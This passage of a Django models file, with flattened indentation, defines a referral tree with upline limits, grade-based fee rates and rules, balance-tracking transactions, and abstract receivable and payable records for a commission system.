unique_together = ('grade', 'rate')
ordering = ['rate__slug']
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
grade = models.ForeignKey(
Grade, on_delete=models.CASCADE,
verbose_name=_("Grade"))
rate = models.ForeignKey(
Rate, on_delete=models.CASCADE,
verbose_name=_("Rate"))
fee_rate = models.DecimalField(
max_digits=4,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(100)
]
)
def __str__(self):
return "%s %s" % (self.grade.name, self.rate.name)
class GradeRule(models.Model):
class Meta:
verbose_name = _('Grade Rule')
verbose_name_plural = _('Grade Rules')
unique_together = ('grade', 'rule')
ordering = ['rule__slug']
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
grade = models.ForeignKey(
Grade, on_delete=models.CASCADE,
verbose_name=_("Grade"))
rule = models.ForeignKey(
Rule, on_delete=models.CASCADE,
verbose_name=_("Rule"))
min_value = models.DecimalField(
max_digits=15,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(5000000000)
]
)
max_value = models.DecimalField(
max_digits=15,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(5000000000)
]
)
def __str__(self):
return "%s %s" % (self.grade.name, self.rule.name)
class ReferralManager(TreeManager):
pass
class Referral(NumeratorMixin, MPTTModel, models.Model):
class Meta:
verbose_name = _('Referral')
verbose_name_plural = _('Referral')
unique_together = ('parent', 'account')
limit = 3
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
parent = TreeForeignKey(
'self', null=True, blank=True,
on_delete=models.SET_NULL,
related_name='downlines',
verbose_name=_('Up Line'))
account = models.OneToOneField(
get_user_model(),
on_delete=models.CASCADE,
verbose_name=_('account'))
balance = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
editable=False,
verbose_name=_("Balance"))
created_at = models.DateTimeField(
default=timezone.now, editable=False)
def __str__(self):
return (
self.account.username
if self.account.get_full_name() in ['', None]
else self.account.get_full_name()
)
def update_balance(self, balance):
self.balance = balance
self.save()
def get_referral_limit(self):
return getattr(settings, 'REFERRAL_DOWNLINE_LIMIT', None) or self.limit
def get_uplines(self):
return self.get_ancestors(include_self=False, ascending=True)[:self.get_referral_limit()]
class Transaction(NumeratorMixin):
class Meta:
ordering = ['-created_at']
verbose_name = _('Transaction')
verbose_name_plural = _('Transactions')
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
flow = models.CharField(
max_length=3,
choices=(('IN', 'In'), ('OUT', 'Out')),
default='IN', verbose_name=_('Flow'))
referral = models.ForeignKey(
Referral, on_delete=models.CASCADE,
related_name='transactions',
verbose_name=_("Referral"))
amount = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
verbose_name=_("Amount"))
rate = models.DecimalField(
default=0.00,
max_digits=5,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(100)
],
verbose_name=_('Rate'))
total = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
verbose_name=_("Total"))
old_balance = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
editable=False,
verbose_name=_("Old Balance"))
balance = models.DecimalField(
default=0,
max_digits=15,
decimal_places=2,
editable=False,
verbose_name=_("Balance"))
note = models.CharField(
max_length=250,
null=True, blank=True,
verbose_name=_('Note'))
created_at = models.DateTimeField(
default=timezone.now, editable=False)
is_verified = models.BooleanField(
default=False)
verified_at = models.DateTimeField(
null=True, blank=True,
editable=False,
verbose_name=_("Verified at"))
content_type = models.ForeignKey(
ContentType,
models.SET_NULL,
blank=True, null=True,
verbose_name=_('reference type'))
object_id = models.CharField(
_('reference id'),
max_length=100,
blank=True, null=True)
content_object = GenericForeignKey()
def __str__(self):
return self.inner_id
def increase_balance(self):
self.balance = self.referral.balance + self.total
return self.balance
def decrease_balance(self):
self.balance = self.referral.balance - self.total
return self.balance
def calculate_balance(self):
self.old_balance = self.referral.balance
return {'IN': self.increase_balance, 'OUT': self.decrease_balance}[self.flow]()
def get_total(self):
return (self.amount * self.rate) / 100
def save(self, *args, **kwargs):
self.total = self.get_total()
self.calculate_balance()
super().save(*args, **kwargs)
class AbstractReceivable(NumeratorMixin, models.Model):
class Meta:
abstract = True
creator = models.ForeignKey(
get_user_model(), null=True, blank=True,
on_delete=models.CASCADE)
referral = models.ForeignKey(
Referral, null=True, blank=True,
related_name="%(class)s_referrals",
on_delete=models.CASCADE)
campaigner = models.ForeignKey(
Referral, null=True, blank=True,
related_name="%(class)s_campaigns",
on_delete=models.CASCADE)
amount = models.DecimalField(
max_digits=15,
decimal_places=2, default=0)
transaction = GenericRelation(
Transaction,
related_query_name='transactions')
is_paid = models.BooleanField(
default=False, editable=False)
is_cancelled = models.BooleanField(
default=False, editable=False)
class AbstractPayable(NumeratorMixin, models.Model):
class Meta:
abstract = True
creator = models.ForeignKey(
get_user_model(), on_delete=models.CASCADE)
referral = models.ForeignKey(
Referral, on_delete=models.CASCADE)
amount = models.DecimalField(
max_digits=15, decimal_places=2, default=0)
transaction = GenericRelation(Transaction, related_query_name='transactions')
is_paid = models.BooleanField(default=False, editable=False)
is_cancelled = models.BooleanField(default=False, editable=False)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.